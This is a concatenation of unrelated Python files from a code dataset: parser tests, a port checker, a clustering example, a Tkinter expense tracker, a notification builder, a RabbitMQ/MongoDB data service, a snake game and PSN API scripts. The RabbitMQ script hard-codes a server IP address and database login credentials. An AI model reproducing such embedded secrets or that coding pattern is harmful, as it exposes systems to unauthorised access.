headers=headers,\n **kwargs,\n )\n if raise_for_status:\n r.raise_for_status()\n return r\n\n\ndef raise_if_404(response, msg, exception_class=ObjectDoesNotExist):\n if response.status_code == 404:\n raise exception_class(msg)\n","sub_path":"airavata_django_portal_sdk/remoteapi.py","file_name":"remoteapi.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"612960071","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"Unit tests for parse_run.py\n\n\"\"\"\n\nimport unittest\nimport json\nimport parse_run\n\nclass TestParseMethods(unittest.TestCase):\n\n def setUp(self):\n results_file = 'test_data/results.json'\n\n json_data = open(results_file)\n self.run_dict = json.load(json_data)\n\n def test_open_run_missing_user(self):\n \"\"\"Confirm user is optional\n \"\"\"\n del self.run_dict['user']\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(run.instrument, 'tricorder')\n\n def test_open_run_all_units_created(self):\n \"\"\"Confirm all 8 units created\n \"\"\"\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(len(run.plate.chips[0].units), 8)\n\n def test_open_run_partial_units_created(self):\n \"\"\"Confirm partial units created\n Remove ROI4 images and test for 6 units\n \"\"\"\n del self.run_dict['plate']['chips'][0]['images'][15]\n del self.run_dict['plate']['chips'][0]['images'][14]\n del self.run_dict['plate']['chips'][0]['images'][13]\n del self.run_dict['plate']['chips'][0]['images'][12]\n run = parse_run.create_data_model(self.run_dict,'')\n self.assertEqual(len(run.plate.chips[0].units), 6)\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test_parse_run.py","file_name":"test_parse_run.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596983572","text":"#!/bin/python\nimport socket\n\ndef net_port(addr,port):\n try:\n ip = socket.gethostbyname(addr)\n sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sk.settimeout(2)\n sk.connect((ip,port))\n sk.close()\n return 1\n except Exception:\n return 0\n# print(net_port(\"192.168.1.182\",3306))","sub_path":"check_netport.py","file_name":"check_netport.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"278196647","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.decomposition import IncrementalPCA\nimport numpy as np\n\nfrom elm.config.dask_settings import client_context\nfrom elm.model_selection.kmeans import kmeans_model_averaging, kmeans_aic\nfrom elm.pipeline import steps, Pipeline\nfrom elm.readers import *\nfrom elm.sample_util.band_selection import select_from_file\nfrom elm.sample_util.metadata_selection import meta_is_day\n\nELM_EXAMPLE_DATA_PATH = os.environ['ELM_EXAMPLE_DATA_PATH']\nband_specs = list(map(lambda x: BandSpec(**x),\n [{'search_key': 'long_name', 'search_value': \"Band 1 \", 'name': 'band_1'},\n {'search_key': 'long_name', 'search_value': \"Band 2 \", 'name': 'band_2'},\n {'search_key': 'long_name', 'search_value': \"Band 3 \", 'name': 'band_3'},\n {'search_key': 'long_name', 'search_value': \"Band 4 \", 'name': 'band_4'},\n {'search_key': 'long_name', 'search_value': \"Band 5 \", 'name': 'band_5'},\n {'search_key': 'long_name', 'search_value': \"Band 6 \", 'name': 'band_6'},\n {'search_key': 'long_name', 'search_value': \"Band 7 \", 'name': 'band_7'},\n {'search_key': 'long_name', 'search_value': \"Band 9 \", 'name': 'band_9'},\n {'search_key': 'long_name', 'search_value': \"Band 10 \", 'name': 'band_10'},\n {'search_key': 'long_name', 'search_value': \"Band 11 \", 'name': 'band_11'}]))\nHDF4_FILES = [f for f in glob.glob(os.path.join(ELM_EXAMPLE_DATA_PATH, 'hdf4', '*hdf'))\n if meta_is_day(load_hdf4_meta(f))]\ndata_source = {\n 'sampler': select_from_file,\n 'band_specs': band_specs,\n 'args_list': HDF4_FILES,\n}\n\n\npipeline_steps = [steps.Flatten(),\n ('scaler', steps.StandardScaler()),\n ('pca', steps.Transform(IncrementalPCA(n_components=4), partial_fit_batches=2)),\n ('kmeans', MiniBatchKMeans(n_clusters=4, compute_labels=True)),]\npipeline = Pipeline(pipeline_steps,\n scoring=kmeans_aic,\n scoring_kwargs=dict(score_weights=[-1]))\n\nensemble_kwargs = {\n 'model_selection': kmeans_model_averaging,\n 'model_selection_kwargs': {\n 'drop_n': 2,\n 'evolve_n': 2,\n },\n 'init_ensemble_size': 4,\n 'ngen': 3,\n 'partial_fit_batches': 2,\n 'saved_ensemble_size': 4,\n}\n\n\ndef main(pipe=None):\n with client_context() as client:\n ensemble_kwargs['client'] = client\n if pipe is None:\n pipe = pipeline\n pipe.fit_ensemble(**data_source, **ensemble_kwargs)\n pred = pipe.predict_many(**data_source, **ensemble_kwargs)\n ensemble_kwargs.pop('client')\n return pipe, pred\n\nif __name__ == '__main__':\n pipe, pred = main()\n if 'plot' in sys.argv:\n pred[0].predict.plot.pcolormesh()\n plt.show()\n","sub_path":"examples/api_example_mods.py","file_name":"api_example_mods.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"471042071","text":"\r\nfrom tkinter import *\r\nfrom tkinter import ttk, messagebox\r\nimport csv\r\nfrom datetime import datetime\r\n\r\nGUI = Tk()\r\nGUI.title('โปรแกรมบันทึกค่าใช้จ่าย V.1.0 by Nakin')\r\nGUI.geometry('700x900+600+0')\r\n\r\n# ---------------MENU-------------------\r\nmenubar = Menu(GUI)\r\nGUI.config(menu=menubar)\r\n\r\n# file menu\r\nfilemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='File',menu=filemenu)\r\nfilemenu.add_command(label='Import csv')\r\nfilemenu.add_command(label='Export to Googlesheet')\r\n\r\ndef Abount():\r\n print('Abount Menu')\r\n messagebox.showinfo('Abount','สวัสดีครับ โปรแกรมนี้คือโปรแกรมบันทึกข้อมูล\\nสนใจบริจาคเราไหม? ขอ 1 BTC ก็พอแล้ว\\nBTC Address:abc')\r\n\r\n\r\nhelpmenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Help',menu=helpmenu)\r\nhelpmenu.add_command(label='Abount',command=Abount)\r\n\r\ndef Donate():\r\n messagebox.showinfo('Donate','XRP Address:rpXTzCuXtjiPDFysxq8uNmtZBe9Xo97JbW\\nXRP Deposit Tag:1023997855') \r\n\r\n\r\ndonatemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Donate',menu=donatemenu)\r\ndonatemenu.add_command(label='Donate',command=Donate)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nTab = ttk.Notebook(GUI)\r\n\r\nT1 = Frame(Tab)\r\nT2 = Frame(Tab)\r\n\r\nTab.pack(fill=BOTH,expand=1)\r\n\r\nroob1=PhotoImage(file='Gold.png').subsample(44)\r\nroob2=PhotoImage(file='Gold2.png').subsample(5)\r\nroob3=PhotoImage(file='Eye.png').subsample(7)\r\n\r\n\r\nTab.add(T1,text=f'{\"Add expense\":^{30}}',image=roob1,compound='top')\r\nTab.add(T2,text=f'{\"Expense list\":^{30}}',image=roob2,compound='top')\r\n\r\n\r\n\r\nF1 =Frame(T1)\r\nF1.pack()\r\ndays = {'Mon':'จันทร์',\r\n 'Tue':'อังคาร',\r\n 'Wed':'พุธ',\r\n 'Thu':'พฤหัสบดี',\r\n 'Fri':'ศุกร์',\r\n 'Sat':'วันเสาร์',\r\n 'Sun':'อาทิตย์'}\r\n\r\n\r\ndef Save(event=None):\r\n expense = v_expense.get()\r\n price = v_price.get()\r\n geeaun = v_geeaun.get()\r\n\r\n if expense == '':\r\n print('No Data')\r\n messagebox.showwarning('Error','กรุณากรอกข้อมูลค่าใช้จ่าย')\r\n return\r\n elif price == '':\r\n messagebox.showwarning('Error','กรุณากรอกราคา') \r\n return\r\n elif geeaun == '':\r\n geeaun = 1\r\n\r\n try:\r\n lakartungmod = float(price)*float(geeaun)\r\n print('รายการ: {} ราคา: {} จำนวน: {} ราคารวม {} '.format(expense,price,geeaun,lakartungmod))\r\n text ='รายการ: {} ราคา: {} จำนวน: {} ราคารวม {}\\n '.format(expense,price,geeaun,lakartungmod)\r\n today = datetime.now().strftime('%a')\r\n dt = datetime.now().strftime('%d-%m-%Y-{} %H:%M:%S'.format(days[today]))\r\n text= text+dt\r\n v_result.set(text)\r\n\r\n v_expense.set('')\r\n v_price.set('')\r\n v_geeaun.set('')\r\n today = datetime.now().strftime('%a')\r\n dt = datetime.now().strftime('%d-%m-%Y-{} %H:%M:%S'.format(days[today]))\r\n print(dt)\r\n \r\n with open('savedata.csv','a',encoding='utf-8',newline='') as f:\r\n fw = csv.writer(f)\r\n data = [dt,expense,price,geeaun,lakartungmod]\r\n fw.writerow(data) \r\n\r\n E1.focus()\r\n update_table()\r\n except Exception as e:\r\n\r\n print('ERROR:',e) \r\n messagebox.showwarning('Error','กรุณากรอกข้อมูลใหม่ คุณกรอกตัวเลขผิด')\r\n v_expense.set('')\r\n v_price.set('')\r\n v_geeaun.set('')\r\n\r\nGUI.bind('',Save) \r\n\r\nFONT1 = (None,20)\r\n\r\nbg = PhotoImage(file='city.png').subsample(7)\r\ncitypic = ttk.Label(F1, image=bg)\r\ncitypic.pack()\r\n\r\n#----------------text1-------------\r\nL = ttk.Label(F1,text = 'รายการค่าใช้จ่าย',font =FONT1).pack()\r\nv_expense =StringVar()\r\nE1 = ttk.Entry(F1,textvariable=v_expense,font=FONT1)\r\nE1.pack()\r\n#----------------------------------\r\n\r\n#----------------text2-------------\r\nL = ttk.Label(F1,text = 'ราคา(บาท)',font =FONT1).pack()\r\nv_price =StringVar()\r\nE2 = ttk.Entry(F1,textvariable=v_price,font=FONT1)\r\nE2.pack()\r\n#----------------------------------\r\n#------------------text3--------------------\r\nL = ttk.Label(F1,text = 'จำนวน(ชิ้น)',font =FONT1).pack()\r\nv_geeaun =StringVar()\r\nE3 = ttk.Entry(F1,textvariable=v_geeaun,font=FONT1)\r\nE3.pack()\r\n\r\n\r\nB2 = ttk.Button(F1,text='Save',image=roob3,compound='top',command=Save)\r\nB2.pack(ipadx=20,ipady=20,pady = 10)\r\n\r\nv_result = StringVar()\r\nv_result.set('---------ผลลัพธ์---------')\r\nresult = ttk.Label(F1, textvariable=v_result,font=FONT1,foreground='green')\r\nresult.pack(pady=20)\r\n\r\n#-------------------Tab2---------------------\r\n\r\ndef read_csv():\r\n with open('savedata.csv',newline ='',encoding='utf-8') as f:\r\n fr = csv.reader(f)\r\n data = list(fr)\r\n return data \r\n \r\n#table\r\n\r\nL = ttk.Label(T2,text = 'ตารางแสงผลลัพธ์ทั้งหมด',font =FONT1).pack(pady=20)\r\n\r\n\r\nheader = ['วัน-เวลา','รายการ','ค่าใช้จ่าย','จำนวน','รวม']\r\nresulttable = ttk.Treeview(T2,columns=header,show ='headings',height =20)\r\nresulttable.pack()\r\n\r\nfor h in header:\r\n resulttable.heading(h,text = h)\r\n\r\nheaderwidth = [150,170,80,80,80]\r\nfor h,w in zip(header,headerwidth):\r\n resulttable.column(h,width = w)\r\n\r\n\r\ndef update_table():\r\n resulttable.delete(*resulttable.get_children())\r\n data = read_csv()\r\n for d in data:\r\n resulttable.insert('',0,value=d)\r\n\r\nupdate_table() \r\n\r\nGUI.mainloop()\r\n","sub_path":"GUIbasic2-expense.py","file_name":"GUIbasic2-expense.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"276799293","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2023 CERN.\n# Copyright (C) 2023 Graz University of Technology.\n#\n# Invenio-RDM-Records is free software; you can redistribute it and/or modify\n# it under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Notification related utils for notifications.\"\"\"\n\nfrom invenio_communities.notifications.generators import CommunityMembersRecipient\nfrom invenio_notifications.models import Notification\nfrom invenio_notifications.registry import EntityResolverRegistry\nfrom invenio_notifications.services.builders import NotificationBuilder\nfrom invenio_notifications.services.generators import EntityResolve, UserEmailBackend\nfrom invenio_users_resources.notifications.filters import UserPreferencesRecipientFilter\nfrom invenio_users_resources.notifications.generators import UserRecipient\n\n\nclass CommunityInclusionNotificationBuilder(NotificationBuilder):\n \"\"\"Base notification builder for record community inclusion events.\"\"\"\n\n type = \"community-submission\"\n\n @classmethod\n def build(cls, request):\n \"\"\"Build notification with request context.\"\"\"\n return Notification(\n type=cls.type,\n context={\n \"request\": EntityResolverRegistry.reference_entity(request),\n },\n )\n\n context = [\n EntityResolve(key=\"request\"),\n EntityResolve(key=\"request.created_by\"),\n EntityResolve(key=\"request.topic\"),\n EntityResolve(key=\"request.receiver\"),\n ]\n\n recipients = [\n CommunityMembersRecipient(key=\"request.receiver\", roles=[\"curator\", \"owner\"]),\n UserRecipient(key=\"request.created_by\"),\n ]\n\n recipient_filters = [\n UserPreferencesRecipientFilter(),\n ]\n\n recipient_backends = [\n UserEmailBackend(),\n ]\n\n\nclass CommunityInclusionSubmittedNotificationBuilder(\n CommunityInclusionNotificationBuilder\n):\n \"\"\"Notification builder for record community inclusion submitted.\"\"\"\n\n type = \"community-submission.submit\"\n","sub_path":"invenio_rdm_records/notifications/builders.py","file_name":"builders.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227626219","text":"import json\nimport pika\nimport sys\nimport uuid\nimport datetime\nimport json\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\ncredentials = pika.PlainCredentials('guest', 'guest')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('95.181.230.220',\n 5672,\n '/',\n credentials))\n# connection = pika.BlockingConnection(pika.ConnectionParameters('localhost')) \n\nchannel = connection.channel()\nchannel.queue_declare(queue='rpc_queue_modules')\nchannel.queue_declare(queue='rpc_queue_modules_for_date')\nchannel.queue_declare(queue='rpc_queue_report_data1')\n\n# channel.exchange_declare(exchange='logs', exchange_type='fanout')\n\nclient = MongoClient('95.181.230.220', 38128, username='SuperNora9', password='tYf74-Gnet5_yhx')\n# client = MongoClient('localhost', 27017)\n\ndef reduce_data(mass):\n interval = len(mass) // 24\n new_mass = []\n for i in range(24):\n new_mass.append(mass[i*interval])\n return new_mass\n\n\n\n\ndef send_response(greenhouseID): \n data = []\n # from_date = datetime.datetime.now() - datetime.timedelta(days=1)\n from_date = datetime.datetime.now() - datetime.timedelta(hours=1)\n to_date = datetime.datetime.now() \n pipeline = [\n {\"$unwind\": \"$components.values\"},\n {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n {\"$sort\": {'type': 1}}\n ]\n # collection = client.data.greenhouses.find_one({\"_id\":ObjectId(greenhouseID)})\n c = client.laboratory.modules.aggregate(pipeline)\n for record in c:\n record['key'] = 'modules'\n data.append(json.dumps(record, default=str))\n data.append(json.dumps({'key':'end'}))\n return data\n\ndef send_response_module_for_date(str_date): \n data = []\n date = datetime.datetime.strptime(str_date, '%Y-%m-%d').date() \n from_date = datetime.datetime(int(date.year), int(date.month), int(date.day), 0, 0, 0)\n to_date = datetime.datetime(int(date.year), int(date.month), int(date.day), 23, 59, 59)\n pipeline = [\n {\"$unwind\": \"$components.values\"},\n {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n {\"$sort\": {'type': 1}}\n ]\n c = client.laboratory.modules.aggregate(pipeline)\n for record in c:\n record['values'] = reduce_data(record['values'])\n record['key'] = 'modules'\n data.append(json.dumps(record, default=str))\n data.append(json.dumps({'key':'end'}))\n return data\n\ndef send_response_data_for_reports(dict): \n data = []\n startDate = datetime.datetime.strptime(dict[\"startDate\"], '%Y-%m-%d %H:%M:%S')\n endDate = datetime.datetime.strptime(dict[\"endDate\"], '%Y-%m-%d %H:%M:%S')\n from_date = datetime.datetime(int(startDate.year), int(startDate.month), int(startDate.day), int(startDate.hour), int(startDate.minute), int(startDate.second))\n to_date = datetime.datetime(int(endDate.year), int(endDate.month), int(endDate.day), int(endDate.hour), int(endDate.minute), int(endDate.second))\n print(from_date) \n print(to_date) \n pipeline = [\n {\"$unwind\": \"$components.values\"},\n {\"$match\": {\"components.values.date\": {\"$gte\": from_date, \"$lt\": to_date}}},\n {\"$group\":{ \"_id\":\"$_id\", \"id\":{\"$first\":\"$id\"}, \"type\":{\"$first\" :\"$components.type\"}, \"values\": {\"$push\": {\"date\":\"$components.values.date\",\"value\":\"$components.values.value\"} } }},\n {\"$sort\": {'type': 1}}\n ]\n c = client.laboratory.modules.aggregate(pipeline)\n for record in c:\n record['values'] = reduce_data(record['values'])\n record['key'] = 'reports'\n data.append(json.dumps(record, default=str))\n data.append(json.dumps({'key':'end'}))\n print(data)\n return data\n\ndef on_request_modules(ch, method, props, body):\n dict = json.loads(body)\n data = []\n if (dict['action'] == \"MODULES\"):\n if ('greenhouse' in dict):\n greenhouse = dict['greenhouse']\n else:\n greenhouse = \"5fa953edf3be7ea1552f2485\"\n data = send_response(greenhouseID = greenhouse)\n for list in data:\n ch.basic_publish(exchange='',routing_key='data-for-server_modules', body=list)\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\ndef on_request_modules_for_date(ch, method, props, body):\n dict = json.loads(body)\n data = []\n # if (dict['action'] == \"MODULES_FOR_DATE\"):\n # data = send_response_module_for_date(dict['date'])\n for list in data:\n ch.basic_publish(exchange='',routing_key='data-for-server_modules_for_date', body=list)\n ch.basic_ack(delivery_tag=method.delivery_tag) \n\ndef on_request_report_data(ch, method, props, body):\n dict = json.loads(body)\n data = []\n print(\"тут\")\n data = send_response_data_for_reports(dict)\n for list in data:\n ch.basic_publish(exchange='',routing_key='data-for-server_data_for_reports1', body=list)\n ch.basic_ack(delivery_tag=method.delivery_tag) \n\nchannel.basic_qos(prefetch_count=1)\nchannel.basic_consume(queue='rpc_queue_modules', on_message_callback=on_request_modules)\nchannel.basic_consume(queue='rpc_queue_report_data1', on_message_callback=on_request_report_data)\nchannel.basic_consume(queue='rpc_queue_modules_for_date', on_message_callback=on_request_modules_for_date)\n\nprint(\" [x] Awaiting RPC requests\")\nprint(\" test #2\")\nchannel.start_consuming()","sub_path":"getModuleData.py","file_name":"getModuleData.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"61288020","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\n\r\na = [[1, 2, 3],\r\n [4, 5, 6]]\r\n\r\na = np.array(a)\r\n\r\ndef sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n\r\ndata = {\r\n 'a': [\r\n 'A101',\r\n 'B101',\r\n 'C101',\r\n 'A101',\r\n 'A101',\r\n 'A101',\r\n 'C101',\r\n np.NaN,\r\n 'A101',\r\n ]\r\n}\r\ndf = DataFrame(data)\r\n\r\ndf.a = df.a.fillna('0').apply(lambda x: x[0])\r\nprint(pd.Categorical(df.a).codes)","sub_path":"numpy-learning/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424782620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 21 16:25:20 2018\n\n@author: houlu\n\"\"\"\nimport sys\nimport random\nimport itertools\nimport numpy as np\nfrom collections.abc import Sequence\n\n\nclass Snake(Sequence):\n\n UP = (-1, 0)\n DOWN = (1, 0)\n RIGHT = (0, 1)\n LEFT = (0, -1)\n INITIAL_POS = [(1, 4), (1, 3), (1, 2), (1, 1)]\n\n def __init__(self):\n self.all_directions = [self.LEFT, self.RIGHT, self.UP, self.DOWN]\n self.dir_names = ['left', 'right', 'up', 'down']\n self.dir2names = dict(zip(self.all_directions, self.dir_names))\n self.dirnumber = len(self.all_directions)\n self.action_to_direction = dict(enumerate(self.all_directions))\n\n def __getitem__(self, item):\n return self.pos[item]\n\n def __len__(self):\n return len(self.pos)\n\n def __iter__(self):\n return iter(self.pos)\n\n def __contains__(self, item):\n return item in self.pos\n\n @staticmethod\n def _tuple_add(t1, t2):\n return t1[0] + t2[0], t1[1] + t2[1]\n\n @property\n def occupation(self):\n return set(self)\n\n @property\n def inversion(self):\n return -self.direction[0], -self.direction[1]\n\n def move(self):\n self.pos.insert(0, self._tuple_add(self.head, self.direction))\n self.pos.pop(-1)\n self.head = self[0]\n\n def turn(self, action_index):\n if action_index is None:\n return\n try:\n next_direction = self.action_to_direction[action_index]\n except KeyError:\n return\n if next_direction == self.inversion:\n return\n else:\n self.direction = next_direction\n\n def eat(self, food):\n if self.head == food:\n self.pos.append(self.pos[-1])\n return True\n else:\n return False\n\n @property\n def available_directions(self):\n return [ind\n for ind, action in enumerate(self.all_directions)\n if not (self._tuple_add(self.head, action) == self[1])\n ]\n\n def reset(self):\n self.pos = self.INITIAL_POS[:]\n self.head = self[0]\n self.direction = self.RIGHT\n\n\nclass Food:\n\n def __init__(self):\n self.color = (52, 115, 243)\n\n @staticmethod\n def _gen(allowed):\n return random.choice(allowed)\n\n def replenish(self, allowed):\n self.pos = self._gen(allowed)\n\n\nclass Game:\n\n def __init__(self, number):\n self.number = number\n self.state_number = self.number + 2\n self.boundry = (1, self.number + 1)\n self.shape = (self.state_number, self.state_number)\n self.grid = set(itertools.product(range(*self.boundry), range(*self.boundry)))\n self.value = {\n 'head': 1,\n 'body': -1,\n 'food': 2,\n 'wall': -2,\n 'earth': 0\n }\n\n self._state = np.zeros(self.shape)\n self.snake = Snake()\n self.food = Food()\n self.reset()\n\n self.score = 0\n\n @property\n def allowed(self):\n return list(self.grid - self.snake.occupation)\n\n @property\n def actions(self):\n return self.snake.available_directions\n\n @property\n def state(self):\n self._state[1:self.number + 1, 1:self.number + 1] = self.value['earth']\n self._state[self.food.pos[0], self.food.pos[1]] = self.value['food']\n for body in self.snake:\n self._state[body[0], body[1]] = self.value['body']\n self._state[self.snake.head[0], self.snake.head[1]] = self.value['head']\n # return np.array([self._state]).reshape(self.state_number, self.state_number, 1)\n return self._state\n\n @property\n def eat(self):\n return self.snake.eat(self.food.pos)\n\n @property\n def size(self):\n return self.state_number, self.snake.dirnumber\n\n @property\n def info(self):\n info = 'Map shape: {} -\\nScore: {}'.format(self.shape, self.score)\n return info\n\n @property\n def death(self):\n body = self.snake[1:]\n if self.snake.head in body:\n return True\n if (not self.boundry[0] <= self.snake.head[0] < self.boundry[1])\\\n or (not self.boundry[0] <= self.snake.head[1] < self.boundry[1]):\n return True\n return False\n\n @property\n def done(self):\n return self.death\n\n def step(self, action):\n self.snake.turn(action)\n self.snake.move()\n return self.state, self.reward, self.done, self.info\n\n def render(self, window):\n window.draw(self.state)\n\n def reset(self):\n self.snake.reset()\n self.food.replenish(self.allowed)\n self._state[[0, self.number + 1], :] = self.value['wall']\n self._state[:, [0, self.number + 1]] = self.value['wall']\n\n def new_food(self):\n self.score += 1\n self.food.replenish(self.allowed)\n\n @property\n def reward(self):\n if self.eat:\n return 1\n elif self.death:\n return -0.5\n else:\n return -0.005\n\n def play(self, engine=None):\n if engine:\n self.render(engine)\n while True:\n if engine:\n action_index = engine.action\n if action_index is False:\n return\n else:\n action_index = self.snake.direction\n self.step(action_index)\n if self.eat:\n self.new_food()\n if engine:\n self.render(engine)\n if self.death:\n return\n\n def close(self, window):\n try:\n window.close()\n except AttributeError:\n del window\n\n\nif __name__ == '__main__':\n base_size = 20\n expansion = 1.5\n number = 10\n g = Game(number=number)\n from window import Window\n window = Window(number=number, block_size=base_size, expansion=expansion, speed=0.1)\n g.play(engine=window)\n sys.exit(0)\n","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"394536812","text":"# -*- coding:utf-8 -*-\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import status\nfrom api.settings import BASE_DIR\nfrom PIL import Image\nfrom rest_framework.parsers import FileUploadParser, MultiPartParser\nfrom models import Resource, UserHasResource, CompanyHasResource\nfrom user.models import Data\nfrom serializers import ResourceSerializer\nimport cloudinary.uploader\nimport cloudinary.api\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom user.upload_helper import Upload_Helper\nimport json\nimport boto3\nimport os\n\n\n\nclass ResourcesAPI(APIView):\n parser_classes = (MultiPartParser,)\n\n def post(self, request):\n\n \"\"\"\n Creates a new Resource\n :param request:\n {\n \"name\": \"string\",\n \"url\": \"string\",\n \"logo\": \"string\",\n \"category\": \"string\"\n }\n :return: {message: string, app: AppSerializer}\n \"\"\"\n data = request.data\n file = request.data.get('file')\n\n try:\n\n if (file):\n url = Upload_Helper.upload_s3(file=file, file_type=data.get('file_type'), thumb=False)\n else:\n url = data.get('url')\n\n resource = Resource.objects.create(\n name=data.get('name', ''),\n category=data.get('category'),\n file_type=data.get('file_type'),\n description=data.get('description'),\n url=url,\n company_id=data.get('company_id', None)\n )\n\n return Response({'resource': ResourceSerializer(resource).data}, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response({'message': 'Error adding new App'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n def get(self, request):\n\n \"\"\"\n Get all Accounting Company Resources\n :return: {message: string, apps: ResourceSerializer}\n \"\"\"\n\n try:\n global_resources = []\n company_resources = []\n practice_resources = []\n\n if request.user.data.user_type == Data.ACCOUNTANT:\n global_resources = ResourceSerializer(Resource.objects.filter(company=None), many=True).data\n practice_resources = ResourceSerializer(\n Resource.objects.filter(company=request.user.data.company), many=True\n ).data\n # all_resources += all_resources + accounting_resources\n\n if request.user.data.user_type == Data.CLIENT:\n company_resources = ResourceSerializer(Resource.objects.filter(\n id__in=CompanyHasResource.objects.filter(company=request.user.data.company)\n .values_list('resource_id', flat=True)), many=True\n ).data\n\n for resource in company_resources:\n company_has_resource = CompanyHasResource.objects.get(\n company=request.user.data.company,\n resource_id=resource.get('id')\n )\n resource['order'] = company_has_resource.order\n resource['user_resource_id'] = company_has_resource.id\n\n from operator import itemgetter\n company_resources = sorted(company_resources, key=itemgetter('order'))\n\n return Response(\n {\n 'global_resources': global_resources,\n 'company_resources': company_resources,\n 'practice_resources': practice_resources\n }, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'message': 'Error retrieving resources'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n\n\n\n\n\n\n","sub_path":"resources/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554626771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom psnapi.Auth import Auth\nfrom psnapi.Friend import Friend\nfrom psnapi.User import User\nfrom psnapi.Messaging import Messaging\nimport json\n\nwith open('tokens', encoding='utf-8') as data_file:\n data = json.loads(data_file.read())\n\nnew_token_pair = Auth.GrabNewTokens(data['refresh'])\n\ntokens = {\n \"oauth\": new_token_pair[0],\n \"refresh\": new_token_pair[1],\n \"npsso\": data['npsso'] # saved above!\n}\nprint(tokens)\n\nfriend = Friend(tokens)\nfriend_list = friend.my_friends()\n# print(friend.my_friends(nickname='onnkei'))\n\nfriend_string = ''\nif bool(friend_list):\n for key, value in friend_list.items():\n if value is not \"\":\n friend_string += key+' is playing '+value+\"\\n\"\n else:\n friend_string += key+' is online'+\"\\n\"\nelse:\n friend_string = 'No friends online'\n\n# print(friend_string.replace('ÂŽ', ''))\n\nuser = User(tokens)\n\n# print(user.userinfo())\n# print(user.userinfo('haruhi2728'))\n# print(friend.get_info('onnkei'))\n\n# print(user.gamesinfo()) # HTTP Error 403: Forbidden\n# print(user.gamesinfo('haruhi2728')) # HTTP Error 403: Forbidden\n\n# print(user.friendsinfo())\n# print(user.friendsinfo('hello1348qwer'))\n# print(user.friendsinfo('onnkei')) # HTTP Error 403: Forbidden\n\n# print(user.trophyinfo('onnkei'))\n\n# print(user.trophy_all())\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"626162909","text":"# Utility\nimport time\nimport datetime\nfrom django.utils import simplejson\n\n# Template and context-related imports\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\n# Django Aggregation\nfrom django.db.models import Sum\n\n# API Models\nfrom element43.apps.api.models import JournalEntry\nfrom apps.api.models import Character, APITimer, CharSkill, MarketTransaction\n\n# Util\nfrom apps.common.util import validate_characters, calculate_character_access_mask\nfrom apps.dashboard.util import calculate_profit_stats\n\n\n@login_required\ndef dashboard(request):\n \"\"\"\n Shows basic information about you account so you can quickly get an overview.\n 